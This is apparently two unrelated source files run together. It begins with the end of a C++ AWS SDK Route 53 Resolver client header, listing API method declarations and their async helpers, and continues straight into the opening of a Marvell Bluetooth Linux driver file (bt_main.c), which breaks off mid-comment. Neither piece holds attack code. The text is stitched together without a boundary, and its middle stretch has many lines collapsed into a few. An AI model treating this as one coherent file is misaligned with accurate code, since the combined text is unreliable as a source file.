        virtual Model::GetResolverRuleOutcome GetResolverRule(const Model::GetResolverRuleRequest& request) const;

        /**
         * Same as GetResolverRule(), but returns a future so the call can be executed in
         * parallel to other requests.
         */
        virtual Model::GetResolverRuleOutcomeCallable GetResolverRuleCallable(const Model::GetResolverRuleRequest& request) const;

        /**
         * Same as GetResolverRule(), but queues the request into a thread executor and
         * triggers the associated callback when the operation has finished.
         */
        virtual void GetResolverRuleAsync(const Model::GetResolverRuleRequest& request, const GetResolverRuleResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context = nullptr) const;

        /**
         * Gets information about an association between a specified Resolver rule and a
         * VPC (created with AssociateResolverRule).
         * See: http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/GetResolverRuleAssociation
         */
        virtual Model::GetResolverRuleAssociationOutcome GetResolverRuleAssociation(const Model::GetResolverRuleAssociationRequest& request) const;

        /**
         * Same as GetResolverRuleAssociation(), but returns a future so the call can be
         * executed in parallel to other requests.
         */
        virtual Model::GetResolverRuleAssociationOutcomeCallable GetResolverRuleAssociationCallable(const Model::GetResolverRuleAssociationRequest& request) const;

        /**
         * Same as GetResolverRuleAssociation(), but queues the request into a thread
         * executor and triggers the associated callback when the operation has finished.
         */
        virtual void GetResolverRuleAssociationAsync(const Model::GetResolverRuleAssociationRequest& request, const GetResolverRuleAssociationResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context = nullptr) const;

        /**
         * Gets the Resolver rule policy for a specified rule: the rule being shared, the
         * account it is shared with, and the Resolver operations that account may use.
         * See: http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/GetResolverRulePolicy
         */
        virtual Model::GetResolverRulePolicyOutcome GetResolverRulePolicy(const Model::GetResolverRulePolicyRequest& request) const;

        /**
         * Same as GetResolverRulePolicy(), but returns a future so the call can be
         * executed in parallel to other requests.
         */
        virtual Model::GetResolverRulePolicyOutcomeCallable GetResolverRulePolicyCallable(const Model::GetResolverRulePolicyRequest& request) const;

        /**
         * Same as GetResolverRulePolicy(), but queues the request into a thread executor
         * and triggers the associated callback when the operation has finished.
         */
        virtual void GetResolverRulePolicyAsync(const Model::GetResolverRulePolicyRequest& request, const GetResolverRulePolicyResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context = nullptr) const;

        /**
         * Lists the DNSSEC validation configurations associated with the current AWS
         * account.
         * See: http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/ListResolverDnssecConfigs
         */
        virtual Model::ListResolverDnssecConfigsOutcome ListResolverDnssecConfigs(const Model::ListResolverDnssecConfigsRequest& request) const;

        /**
         * Same as ListResolverDnssecConfigs(), but returns a future so the call can be
         * executed in parallel to other requests.
         */
        virtual Model::ListResolverDnssecConfigsOutcomeCallable ListResolverDnssecConfigsCallable(const Model::ListResolverDnssecConfigsRequest& request) const;

        /**
         * Same as ListResolverDnssecConfigs(), but queues the request into a thread
         * executor and triggers the associated callback when the operation has finished.
         */
        virtual void ListResolverDnssecConfigsAsync(const Model::ListResolverDnssecConfigsRequest& request, const ListResolverDnssecConfigsResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context = nullptr) const;

        /**
         * Gets the IP addresses for a specified Resolver endpoint.
         * See: http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/ListResolverEndpointIpAddresses
         */
        virtual Model::ListResolverEndpointIpAddressesOutcome ListResolverEndpointIpAddresses(const Model::ListResolverEndpointIpAddressesRequest& request) const;

        /**
         * Same as ListResolverEndpointIpAddresses(), but returns a future so the call
         * can be executed in parallel to other requests.
         */
        virtual Model::ListResolverEndpointIpAddressesOutcomeCallable ListResolverEndpointIpAddressesCallable(const Model::ListResolverEndpointIpAddressesRequest& request) const;

        /**
         * Same as ListResolverEndpointIpAddresses(), but queues the request into a
         * thread executor and triggers the associated callback when the operation has
         * finished.
         */
        virtual void ListResolverEndpointIpAddressesAsync(const Model::ListResolverEndpointIpAddressesRequest& request, const ListResolverEndpointIpAddressesResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context = nullptr) const;

        /**
         * Lists all the Resolver endpoints that were created using the current AWS
         * account.
         * See: http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/ListResolverEndpoints
         */
        virtual Model::ListResolverEndpointsOutcome ListResolverEndpoints(const Model::ListResolverEndpointsRequest& request) const;

        /**
         * Same as ListResolverEndpoints(), but returns a future so the call can be
         * executed in parallel to other requests.
         */
        virtual Model::ListResolverEndpointsOutcomeCallable ListResolverEndpointsCallable(const Model::ListResolverEndpointsRequest& request) const;

        /**
         * Same as ListResolverEndpoints(), but queues the request into a thread executor
         * and triggers the associated callback when the operation has finished.
         */
        virtual void ListResolverEndpointsAsync(const Model::ListResolverEndpointsRequest& request, const ListResolverEndpointsResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context = nullptr) const;

        /**
         * Lists information about associations between Amazon VPCs and query logging
         * configurations.
         * See: http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/ListResolverQueryLogConfigAssociations
         */
        virtual Model::ListResolverQueryLogConfigAssociationsOutcome ListResolverQueryLogConfigAssociations(const Model::ListResolverQueryLogConfigAssociationsRequest& request) const;

        /**
         * Same as ListResolverQueryLogConfigAssociations(), but returns a future so the
         * call can be executed in parallel to other requests.
         */
        virtual Model::ListResolverQueryLogConfigAssociationsOutcomeCallable ListResolverQueryLogConfigAssociationsCallable(const Model::ListResolverQueryLogConfigAssociationsRequest& request) const;

        /**
         * Same as ListResolverQueryLogConfigAssociations(), but queues the request into
         * a thread executor and triggers the associated callback when the operation has
         * finished.
         */
        virtual void ListResolverQueryLogConfigAssociationsAsync(const Model::ListResolverQueryLogConfigAssociationsRequest& request, const ListResolverQueryLogConfigAssociationsResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context = nullptr) const;

        /**
         * Lists information about the specified query logging configurations; each
         * configuration defines where Resolver saves DNS query logs and which VPCs are
         * logged.
         * See: http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/ListResolverQueryLogConfigs
         */
        virtual Model::ListResolverQueryLogConfigsOutcome ListResolverQueryLogConfigs(const Model::ListResolverQueryLogConfigsRequest& request) const;

        /**
         * Same as ListResolverQueryLogConfigs(), but returns a future so the call can be
         * executed in parallel to other requests.
         */
        virtual Model::ListResolverQueryLogConfigsOutcomeCallable ListResolverQueryLogConfigsCallable(const Model::ListResolverQueryLogConfigsRequest& request) const;

        /**
         * Same as ListResolverQueryLogConfigs(), but queues the request into a thread
         * executor and triggers the associated callback when the operation has finished.
         */
        virtual void ListResolverQueryLogConfigsAsync(const Model::ListResolverQueryLogConfigsRequest& request, const ListResolverQueryLogConfigsResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context = nullptr) const;

        /**
         * Lists the associations that were created between Resolver rules and VPCs using
         * the current AWS account.
         * See: http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/ListResolverRuleAssociations
         */
        virtual Model::ListResolverRuleAssociationsOutcome ListResolverRuleAssociations(const Model::ListResolverRuleAssociationsRequest& request) const;

        /**
         * Same as ListResolverRuleAssociations(), but returns a future so the call can
         * be executed in parallel to other requests.
         */
        virtual Model::ListResolverRuleAssociationsOutcomeCallable ListResolverRuleAssociationsCallable(const Model::ListResolverRuleAssociationsRequest& request) const;

        /**
         * Same as ListResolverRuleAssociations(), but queues the request into a thread
         * executor and triggers the associated callback when the operation has finished.
         */
        virtual void ListResolverRuleAssociationsAsync(const Model::ListResolverRuleAssociationsRequest& request, const ListResolverRuleAssociationsResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context = nullptr) const;

        /**
         * Lists the Resolver rules that were created using the current AWS account.
         * See: http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/ListResolverRules
         */
        virtual Model::ListResolverRulesOutcome ListResolverRules(const Model::ListResolverRulesRequest& request) const;

        /**
         * Same as ListResolverRules(), but returns a future so the call can be executed
         * in parallel to other requests.
         */
        virtual Model::ListResolverRulesOutcomeCallable ListResolverRulesCallable(const Model::ListResolverRulesRequest& request) const;

        /**
         * Same as ListResolverRules(), but queues the request into a thread executor and
         * triggers the associated callback when the operation has finished.
         */
        virtual void ListResolverRulesAsync(const Model::ListResolverRulesRequest& request, const ListResolverRulesResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context = nullptr) const;

        /**
         * Lists the tags that are associated with the specified resource.
         * See: http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/ListTagsForResource
         */
        virtual Model::ListTagsForResourceOutcome ListTagsForResource(const Model::ListTagsForResourceRequest& request) const;

        /**
         * Same as ListTagsForResource(), but returns a future so the call can be
         * executed in parallel to other requests.
         */
        virtual Model::ListTagsForResourceOutcomeCallable ListTagsForResourceCallable(const Model::ListTagsForResourceRequest& request) const;

        /**
         * Same as ListTagsForResource(), but queues the request into a thread executor
         * and triggers the associated callback when the operation has finished.
         */
        virtual void ListTagsForResourceAsync(const Model::ListTagsForResourceRequest& request, const ListTagsForResourceResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context = nullptr) const;

        /**
         * Specifies an AWS account to share a query logging configuration with, the
         * configuration to share, and the operations that account may perform on it.
         * See: http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/PutResolverQueryLogConfigPolicy
         */
        virtual Model::PutResolverQueryLogConfigPolicyOutcome PutResolverQueryLogConfigPolicy(const Model::PutResolverQueryLogConfigPolicyRequest& request) const;

        /**
         * Same as PutResolverQueryLogConfigPolicy(), but returns a future so the call
         * can be executed in parallel to other requests.
         */
        virtual Model::PutResolverQueryLogConfigPolicyOutcomeCallable PutResolverQueryLogConfigPolicyCallable(const Model::PutResolverQueryLogConfigPolicyRequest& request) const;

        /**
         * Same as PutResolverQueryLogConfigPolicy(), but queues the request into a
         * thread executor and triggers the associated callback when the operation has
         * finished.
         */
        virtual void PutResolverQueryLogConfigPolicyAsync(const Model::PutResolverQueryLogConfigPolicyRequest& request, const PutResolverQueryLogConfigPolicyResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context = nullptr) const;

        /**
         * Specifies a rule to share with another account, the account to share it with,
         * and the operations that account may perform on the rule.
         * See: http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/PutResolverRulePolicy
         */
        virtual Model::PutResolverRulePolicyOutcome PutResolverRulePolicy(const Model::PutResolverRulePolicyRequest& request) const;

        /**
         * Same as PutResolverRulePolicy(), but returns a future so the call can be
         * executed in parallel to other requests.
         */
        virtual Model::PutResolverRulePolicyOutcomeCallable PutResolverRulePolicyCallable(const Model::PutResolverRulePolicyRequest& request) const;

        /**
         * Same as PutResolverRulePolicy(), but queues the request into a thread executor
         * and triggers the associated callback when the operation has finished.
         */
        virtual void PutResolverRulePolicyAsync(const Model::PutResolverRulePolicyRequest& request, const PutResolverRulePolicyResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context = nullptr) const;

        /**
         * Adds one or more tags to a specified resource.
         * See: http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/TagResource
         */
        virtual Model::TagResourceOutcome TagResource(const Model::TagResourceRequest& request) const;

        /**
         * Same as TagResource(), but returns a future so the call can be executed in
         * parallel to other requests.
         */
        virtual Model::TagResourceOutcomeCallable TagResourceCallable(const Model::TagResourceRequest& request) const;

        /**
         * Same as TagResource(), but queues the request into a thread executor and
         * triggers the associated callback when the operation has finished.
         */
        virtual void TagResourceAsync(const Model::TagResourceRequest& request, const TagResourceResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context = nullptr) const;

        /**
         * Removes one or more tags from a specified resource.
         * See: http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/UntagResource
         */
        virtual Model::UntagResourceOutcome UntagResource(const Model::UntagResourceRequest& request) const;

        /**
         * Same as UntagResource(), but returns a future so the call can be executed in
         * parallel to other requests.
         */
        virtual Model::UntagResourceOutcomeCallable UntagResourceCallable(const Model::UntagResourceRequest& request) const;

        /**
         * Same as UntagResource(), but queues the request into a thread executor and
         * triggers the associated callback when the operation has finished.
         */
        virtual void UntagResourceAsync(const Model::UntagResourceRequest& request, const UntagResourceResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context = nullptr) const;

        /**
         * Updates an existing DNSSEC validation configuration; if there is no existing
         * configuration, one is created.
         * See: http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/UpdateResolverDnssecConfig
         */
        virtual Model::UpdateResolverDnssecConfigOutcome UpdateResolverDnssecConfig(const Model::UpdateResolverDnssecConfigRequest& request) const;

        /**
         * <p>Updates an existing DNSSEC validation configuration. 
If there is no existing * DNSSEC validation configuration, one is created.</p><p><h3>See Also:</h3> <a * href="http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/UpdateResolverDnssecConfig">AWS * API Reference</a></p> * * returns a future to the operation so that it can be executed in parallel to other requests. */ virtual Model::UpdateResolverDnssecConfigOutcomeCallable UpdateResolverDnssecConfigCallable(const Model::UpdateResolverDnssecConfigRequest& request) const; /** * <p>Updates an existing DNSSEC validation configuration. If there is no existing * DNSSEC validation configuration, one is created.</p><p><h3>See Also:</h3> <a * href="http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/UpdateResolverDnssecConfig">AWS * API Reference</a></p> * * Queues the request into a thread executor and triggers associated callback when operation has finished. */ virtual void UpdateResolverDnssecConfigAsync(const Model::UpdateResolverDnssecConfigRequest& request, const UpdateResolverDnssecConfigResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context = nullptr) const; /** * <p>Updates the name of an inbound or an outbound Resolver endpoint. * </p><p><h3>See Also:</h3> <a * href="http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/UpdateResolverEndpoint">AWS * API Reference</a></p> */ virtual Model::UpdateResolverEndpointOutcome UpdateResolverEndpoint(const Model::UpdateResolverEndpointRequest& request) const; /** * <p>Updates the name of an inbound or an outbound Resolver endpoint. * </p><p><h3>See Also:</h3> <a * href="http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/UpdateResolverEndpoint">AWS * API Reference</a></p> * * returns a future to the operation so that it can be executed in parallel to other requests. 
*/ virtual Model::UpdateResolverEndpointOutcomeCallable UpdateResolverEndpointCallable(const Model::UpdateResolverEndpointRequest& request) const; /** * <p>Updates the name of an inbound or an outbound Resolver endpoint. * </p><p><h3>See Also:</h3> <a * href="http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/UpdateResolverEndpoint">AWS * API Reference</a></p> * * Queues the request into a thread executor and triggers associated callback when operation has finished. */ virtual void UpdateResolverEndpointAsync(const Model::UpdateResolverEndpointRequest& request, const UpdateResolverEndpointResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context = nullptr) const; /** * <p>Updates settings for a specified Resolver rule. <code>ResolverRuleId</code> * is required, and all other parameters are optional. If you don't specify a * parameter, it retains its current value.</p><p><h3>See Also:</h3> <a * href="http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/UpdateResolverRule">AWS * API Reference</a></p> */ virtual Model::UpdateResolverRuleOutcome UpdateResolverRule(const Model::UpdateResolverRuleRequest& request) const; /** * <p>Updates settings for a specified Resolver rule. <code>ResolverRuleId</code> * is required, and all other parameters are optional. If you don't specify a * parameter, it retains its current value.</p><p><h3>See Also:</h3> <a * href="http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/UpdateResolverRule">AWS * API Reference</a></p> * * returns a future to the operation so that it can be executed in parallel to other requests. */ virtual Model::UpdateResolverRuleOutcomeCallable UpdateResolverRuleCallable(const Model::UpdateResolverRuleRequest& request) const; /** * <p>Updates settings for a specified Resolver rule. <code>ResolverRuleId</code> * is required, and all other parameters are optional. 
If you don't specify a * parameter, it retains its current value.</p><p><h3>See Also:</h3> <a * href="http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/UpdateResolverRule">AWS * API Reference</a></p> * * Queues the request into a thread executor and triggers associated callback when operation has finished. */ virtual void UpdateResolverRuleAsync(const Model::UpdateResolverRuleRequest& request, const UpdateResolverRuleResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context = nullptr) const; void OverrideEndpoint(const Aws::String& endpoint); private: void init(const Aws::Client::ClientConfiguration& clientConfiguration); void AssociateResolverEndpointIpAddressAsyncHelper(const Model::AssociateResolverEndpointIpAddressRequest& request, const AssociateResolverEndpointIpAddressResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const; void AssociateResolverQueryLogConfigAsyncHelper(const Model::AssociateResolverQueryLogConfigRequest& request, const AssociateResolverQueryLogConfigResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const; void AssociateResolverRuleAsyncHelper(const Model::AssociateResolverRuleRequest& request, const AssociateResolverRuleResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const; void CreateResolverEndpointAsyncHelper(const Model::CreateResolverEndpointRequest& request, const CreateResolverEndpointResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const; void CreateResolverQueryLogConfigAsyncHelper(const Model::CreateResolverQueryLogConfigRequest& request, const CreateResolverQueryLogConfigResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const; void CreateResolverRuleAsyncHelper(const 
Model::CreateResolverRuleRequest& request, const CreateResolverRuleResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const; void DeleteResolverEndpointAsyncHelper(const Model::DeleteResolverEndpointRequest& request, const DeleteResolverEndpointResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const; void DeleteResolverQueryLogConfigAsyncHelper(const Model::DeleteResolverQueryLogConfigRequest& request, const DeleteResolverQueryLogConfigResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const; void DeleteResolverRuleAsyncHelper(const Model::DeleteResolverRuleRequest& request, const DeleteResolverRuleResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const; void DisassociateResolverEndpointIpAddressAsyncHelper(const Model::DisassociateResolverEndpointIpAddressRequest& request, const DisassociateResolverEndpointIpAddressResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const; void DisassociateResolverQueryLogConfigAsyncHelper(const Model::DisassociateResolverQueryLogConfigRequest& request, const DisassociateResolverQueryLogConfigResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const; void DisassociateResolverRuleAsyncHelper(const Model::DisassociateResolverRuleRequest& request, const DisassociateResolverRuleResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const; void GetResolverDnssecConfigAsyncHelper(const Model::GetResolverDnssecConfigRequest& request, const GetResolverDnssecConfigResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const; void GetResolverEndpointAsyncHelper(const Model::GetResolverEndpointRequest& request, const 
GetResolverEndpointResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const; void GetResolverQueryLogConfigAsyncHelper(const Model::GetResolverQueryLogConfigRequest& request, const GetResolverQueryLogConfigResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const; void GetResolverQueryLogConfigAssociationAsyncHelper(const Model::GetResolverQueryLogConfigAssociationRequest& request, const GetResolverQueryLogConfigAssociationResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const; void GetResolverQueryLogConfigPolicyAsyncHelper(const Model::GetResolverQueryLogConfigPolicyRequest& request, const GetResolverQueryLogConfigPolicyResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const; void GetResolverRuleAsyncHelper(const Model::GetResolverRuleRequest& request, const GetResolverRuleResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const; void GetResolverRuleAssociationAsyncHelper(const Model::GetResolverRuleAssociationRequest& request, const GetResolverRuleAssociationResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const; void GetResolverRulePolicyAsyncHelper(const Model::GetResolverRulePolicyRequest& request, const GetResolverRulePolicyResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const; void ListResolverDnssecConfigsAsyncHelper(const Model::ListResolverDnssecConfigsRequest& request, const ListResolverDnssecConfigsResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const; void ListResolverEndpointIpAddressesAsyncHelper(const Model::ListResolverEndpointIpAddressesRequest& request, const 
ListResolverEndpointIpAddressesResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const; void ListResolverEndpointsAsyncHelper(const Model::ListResolverEndpointsRequest& request, const ListResolverEndpointsResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const; void ListResolverQueryLogConfigAssociationsAsyncHelper(const Model::ListResolverQueryLogConfigAssociationsRequest& request, const ListResolverQueryLogConfigAssociationsResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const; void ListResolverQueryLogConfigsAsyncHelper(const Model::ListResolverQueryLogConfigsRequest& request, const ListResolverQueryLogConfigsResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const; void ListResolverRuleAssociationsAsyncHelper(const Model::ListResolverRuleAssociationsRequest& request, const ListResolverRuleAssociationsResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const; void ListResolverRulesAsyncHelper(const Model::ListResolverRulesRequest& request, const ListResolverRulesResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const; void ListTagsForResourceAsyncHelper(const Model::ListTagsForResourceRequest& request, const ListTagsForResourceResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const; void PutResolverQueryLogConfigPolicyAsyncHelper(const Model::PutResolverQueryLogConfigPolicyRequest& request, const PutResolverQueryLogConfigPolicyResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const; void PutResolverRulePolicyAsyncHelper(const Model::PutResolverRulePolicyRequest& request, const PutResolverRulePolicyResponseReceivedHandler& handler, 
const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const; void TagResourceAsyncHelper(const Model::TagResourceRequest& request, const TagResourceResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const; void UntagResourceAsyncHelper(const Model::UntagResourceRequest& request, const UntagResourceResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const; void UpdateResolverDnssecConfigAsyncHelper(const Model::UpdateResolverDnssecConfigRequest& request, const UpdateResolverDnssecConfigResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const; void UpdateResolverEndpointAsyncHelper(const Model::UpdateResolverEndpointRequest& request, const UpdateResolverEndpointResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const; void UpdateResolverRuleAsyncHelper(const Model::UpdateResolverRuleRequest& request, const UpdateResolverRuleResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const; Aws::String m_uri; Aws::String m_configScheme; std::shared_ptr<Aws::Utils::Threading::Executor> m_executor; }; } // namespace Route53Resolver } // namespace Aws
/** @file bt_main.c * * @brief This file contains the major functions in BlueTooth * driver. It includes init, exit, open, close and main * thread etc.. * * Copyright (C) 2007-2013, Marvell International Ltd. * * This software file (the "File") is distributed by Marvell International * Ltd. under the terms of the GNU General Public License Version 2, June 1991 * (the "License"). You may use, redistribute and/or modify this File in * accordance with the terms and conditions of the License, a copy of which * is available along with the File in the gpl.txt file or by writing to * the Free Software Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA * 02111-1307 or on the worldwide web at http://www.gnu.org/licenses/gpl.txt. * * THE FILE IS DISTRIBUTED AS-IS, WITHOUT WARRANTY OF ANY KIND, AND THE * IMPLIED WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE * ARE EXPRESSLY DISCLAIMED. The License provides additional details about * this warranty disclaimer. * */ /** * @mainpage M-BT Linux Driver * * @section overview_sec Overview * * The M-BT is a Linux reference driver for Marvell Bluetooth chipset. * * @section copyright_sec Copyright * * Copyright (C) 2007-2013, Marvell International Ltd. 
 *
 */

/* Kernel headers */
#include <linux/module.h>
#include <linux/platform_device.h>
#include <linux/wlan_plat.h>
#include <linux/interrupt.h>

/* Driver-local headers */
#include "bt_drv.h"
#include "mbt_char.h"
#include "bt_sdio.h"

/** Version */
#define VERSION "M2614110"

/** Driver version string: chip, feature pack, optional debug tag */
static char mbt_driver_version[] = "SD8897-%s-" VERSION "-(" "FP" FPNUM ")"
#ifdef DEBUG_LEVEL2
	"-dbg"
#endif
	" ";

/** Declare and initialize fw_version (overwritten from the
 *  BT_CMD_GET_FW_VERSION command-complete event) */
static char fw_version[32] = "0.0.0.p0";

/* Android UIDs used for chardev ownership */
#define AID_SYSTEM 1000 /* system server */
#define AID_BLUETOOTH 1002 /* bluetooth subsystem */

/** Define module name */
#define MODULE_NAME "bt_fm_nfc"

/** Declaration of chardev class */
static struct class *chardev_class;

/** Interface specific variables: minor numbers of the char devices */
static int mbtchar_minor;
static int fmchar_minor;
static int nfcchar_minor;
static int debugchar_minor;

/** Default Driver mode: BT + FM + NFC interfaces all enabled */
static int drv_mode = (DRV_MODE_BT | DRV_MODE_FM | DRV_MODE_NFC);

/** BT interface name */
static char *bt_name;
/** FM interface name */
static char *fm_name;
/** NFC interface name */
static char *nfc_name;
/** BT debug interface name */
static char *debug_name;

/** Firmware flag */
static int fw = 1;
/** default powermode */
static int psmode = 1;
/** Init config file (MAC address, register etc.) */
static char *init_cfg;
/** Calibration config file (MAC address, init power etc.)
 */
static char *cal_cfg;
/** Calibration config file EXT */
static char *cal_cfg_ext;
/** Init MAC address */
static char *bt_mac;

/** Setting mbt_drvdbg value based on DEBUG level */
#ifdef DEBUG_LEVEL1
#ifdef DEBUG_LEVEL2
#define DEFAULT_DEBUG_MASK (0xffffffff & ~DBG_EVENT)
#else
#define DEFAULT_DEBUG_MASK (DBG_MSG | DBG_FATAL | DBG_ERROR)
#endif /* DEBUG_LEVEL2 */
u32 mbt_drvdbg = DEFAULT_DEBUG_MASK;
#endif

#ifdef SDIO_SUSPEND_RESUME
/** PM keep power */
int mbt_pm_keep_power = 1;
#endif

static int debug_intf = 1;
/** Enable minicard power-up/down */
static int minicard_pwrup = 1;
/** Pointer to struct with control hooks */
static struct wifi_platform_data *bt_control_data;

#define IORESOURCE_NAME "mrvl_bt_irq"
#define DRIVER_NAME "bt hostwake"

/* Forward declarations */
void mdev_poweroff(struct m_dev *m_dev);
static struct resource *bt_irqres;
static int irq_registered;
static void bt_register_hostwake_irq(void *handle);

/**
 *  @brief Alloc bt device
 *
 *  Caller owns the returned zeroed structure; it is released via
 *  free_m_dev() on the owning m_dev.
 *
 *  @return    pointer to structure mbt_dev or NULL
 */
struct mbt_dev *
alloc_mbt_dev(void)
{
	struct mbt_dev *mbt_dev;
	ENTER();
	mbt_dev = kzalloc(sizeof(struct mbt_dev), GFP_KERNEL);
	if (!mbt_dev) {
		LEAVE();
		return NULL;
	}
	LEAVE();
	return mbt_dev;
}

/**
 *  @brief Alloc fm device
 *
 *  @return    pointer to structure fm_dev or NULL
 */
struct fm_dev *
alloc_fm_dev(void)
{
	struct fm_dev *fm_dev;
	ENTER();
	fm_dev = kzalloc(sizeof(struct fm_dev), GFP_KERNEL);
	if (!fm_dev) {
		LEAVE();
		return NULL;
	}
	LEAVE();
	return fm_dev;
}

/**
 *  @brief Alloc nfc device
 *
 *  @return    pointer to structure nfc_dev or NULL
 */
struct nfc_dev *
alloc_nfc_dev(void)
{
	struct nfc_dev *nfc_dev;
	ENTER();
	nfc_dev = kzalloc(sizeof(struct nfc_dev), GFP_KERNEL);
	if (!nfc_dev) {
		LEAVE();
		return NULL;
	}
	LEAVE();
	return nfc_dev;
}

/**
 *  @brief Alloc debug device
 *
 *  @return    pointer to structure debug_level or NULL
 */
struct debug_dev *
alloc_debug_dev(void)
{
	struct debug_dev *debug_dev;
	ENTER();
	debug_dev = kzalloc(sizeof(struct debug_dev), GFP_KERNEL);
	if (!debug_dev) {
		LEAVE();
		return
			NULL;
	}
	LEAVE();
	return debug_dev;
}

/**
 *  @brief Frees m_dev
 *
 *  Releases the device structure attached by one of the alloc_*_dev()
 *  helpers and clears the pointer so a double free is harmless.
 *
 *  @return    N/A
 */
void
free_m_dev(struct m_dev *m_dev)
{
	ENTER();
	kfree(m_dev->dev_pointer);
	m_dev->dev_pointer = NULL;
	LEAVE();
}

/**
 *  @brief This function verify the received event pkt
 *
 *  Event format:
 *  +--------+--------+--------+--------+
 *  | Event  | Length | ncmd   | Opcode |
 *  +--------+--------+--------+--------+
 *  | 1-byte | 1-byte | 1-byte | 2-byte |
